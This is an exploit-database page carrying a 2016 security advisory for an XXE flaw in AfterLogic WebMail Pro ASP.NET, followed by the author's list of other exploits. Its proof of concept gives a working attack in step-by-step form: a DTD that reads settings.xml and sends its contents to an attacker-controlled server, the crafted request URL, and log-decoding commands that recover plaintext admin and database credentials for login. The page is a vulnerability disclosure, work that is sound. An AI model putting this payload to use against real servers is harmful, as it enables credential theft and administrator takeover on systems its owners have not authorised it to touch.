Search for hundreds of thousands of exploits

"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection"

Author

Exploit author

"Mehmet Ince"

Platform

Exploit platform

asp

Release date

Exploit published date

2016-05-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
1. ADVISORY INFORMATION
========================================
Title: AfterLogic WebMail Pro ASP.NET Administrator Account Takover via XXE
Injection
Application: AfterLogic WebMail Pro ASP.NET
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: AfterLogic WebMail Pro ASP.NET < 6.2.7
Vendor URL: http://www.afterlogic.com/webmail-client-asp-net
Bugs:  XXE Injection
Date of found:  28.03.2016
Reported:  22.05.2016
Vendor response: 22.05.2016
Date of Public Advisory: 23.05.2016
Author: Mehmet Ince


2. CREDIT
========================================
This vulnerability was identified during penetration test
by Mehmet INCE & Halit Alptekin from PRODAFT / INVICTUS


3. VERSIONS AFFECTED
========================================
AfterLogic WebMail Pro ASP.NET < 6.2.7


4. INTRODUCTION
========================================
It seems that /webmail/spellcheck.aspx?xml= endpoint takes XML request as
an parameter and parse it with XML entities.
By abusing XML entities attackers can read Web.config file as well as
settings.xml that contains administrator account
credentials in plain-text.

5. TECHNICAL DETAILS & POC
========================================

1 - Put following XML entity definition into your attacker server. E.g:
/var/www/html/test.dtd. Do NOT forget to change ATTACKER_SERVER_IP.

<!ENTITY % payl SYSTEM
"file://c:/inetpub/wwwroot/apps/webmail/app_data/settings/settings.xml">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM '
http://ATTACKER_SERVER_IP/?p=%payl;'>">

2 - Start reading access log on your attacker server.

tail -f /var/log/apache/access.log

3 - Send following HTTP GET request to the target.

http://TARGET_DOMAIN/webmail/spellcheck.aspx?xml=<?xml version="1.0"
encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://81.17.25.9/test.dtd">
%remote;
%int;
%trick;]>

4 - You will see the settings.xml content in your access log.
5 - In order to decode and see it in pretty format. Please follow
instruction in order.
5.1 - Create urldecode alias by executing following command.

alias urldecode='python -c "import sys, urllib as ul; \
    print ul.unquote_plus(sys.argv[1])"'

5.2 - Get last line of access log and pass it to the urldecode.

root@hacker:/var/www/html# urldecode $(tail -n 1
/var/log/apache2/access.log|awk {'print $7'})
/?p=
<Settings>
  <Common>
    <SiteName>[SITE_NAME_WILL_BE_HERE]</SiteName>
    <LicenseKey>[LICENSE_KEY]/LicenseKey>
    <AdminLogin>[ADMINISTRATOR_USERNAME]</AdminLogin>
    <AdminPassword>[ADMINISTRATOR_PASSWORD]</AdminPassword>
    <DBType>MSSQL</DBType>
    <DBLogin>WebMailUser</DBLogin>
    <DBPassword>[DATABASE_PASSWORD]</DBPassword>
    <DBName>Webmail</DBName>
    <DBDSN>
    </DBDSN>
    <DBHost>localhost\SQLEXPRESS</DBHost>
    ....
    ....
    ...

6 - You can login by using these administration credentials.
Login panel is located at http://TARGET_DOMAIN/webmail/adminpanel/


6. RISK
========================================
The vulnerability allows remote attackers to read sensitive information
from the server such as settings.xml or web.config which contains
administrator
account and database credentials.

7. SOLUTION
========================================
Update to the latest version v1.4.2

8. REPORT TIMELINE
========================================
28.03.2016: Vulnerability discovered during pentest
29.03.2016: Our client requested a time to mitigate their infrastructures
22.05.2016: First contact with vendor
22.05.2016: Vendor requested more technical details.
23.05.2016: Vendor publishes update with 6.2.7 release.
23.05.2016: Advisory released

9. REFERENCES
========================================
https://twitter.com/afterlogic/status/734764320165400576


-- 
Sr. Information Security Engineer
https://www.mehmetince.net
Release DateTitleTypePlatformAuthor
2020-07-14"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2020-04-06"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2019-01-07"Mailcleaner - Authenticated Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2018-07-24"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2018-06-26"Liferay Portal < 7.0.4 - Server-Side Request Forgery"webappsjava"Mehmet Ince"
2018-03-12"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)"webappsjava"Mehmet Ince"
2018-01-04"Xplico - Remote Code Execution (Metasploit)"remotelinux"Mehmet Ince"
2017-10-11"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-10-11"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-09-19"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)"webappslinux"Mehmet Ince"
2017-09-12"osTicket 1.10 - SQL Injection (PoC)"webappsphp"Mehmet Ince"
2017-06-26"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-05-09"Crypttech CryptoLog - Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-03-24"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)"remotepython"Mehmet Ince"
2017-03-17"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)"remotelinux"Mehmet Ince"
2017-01-31"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-01-15"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2017-01-08"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities"webappsjava"Mehmet Ince"
2016-09-21"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)"remotephp"Mehmet Ince"
2016-07-25"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)"webappsphp"Mehmet Ince"
2016-07-20"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)"remotephp"Mehmet Ince"
2016-07-11"Tiki Wiki 15.1 - File Upload (Metasploit)"remotephp"Mehmet Ince"
2016-06-27"BigTree CMS 4.2.11 - SQL Injection"webappsphp"Mehmet Ince"
2016-06-15"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities"webappsphp"Mehmet Ince"
2016-05-24"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection"webappsasp"Mehmet Ince"
2014-04-24"Bonefire 0.7.1 - Reinstall Admin Account"webappsphp"Mehmet Ince"
2014-04-22"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key"webappsphp"Mehmet Ince"
2012-05-01"WordPress Plugin Zingiri Web Shop 2.4.2 - Persistent Cross-Site Scripting"webappsphp"Mehmet Ince"
2012-04-27"SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection"webappsphp"Mehmet Ince"
2012-04-26"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities"webappsphp"Mehmet Ince"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/39850/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.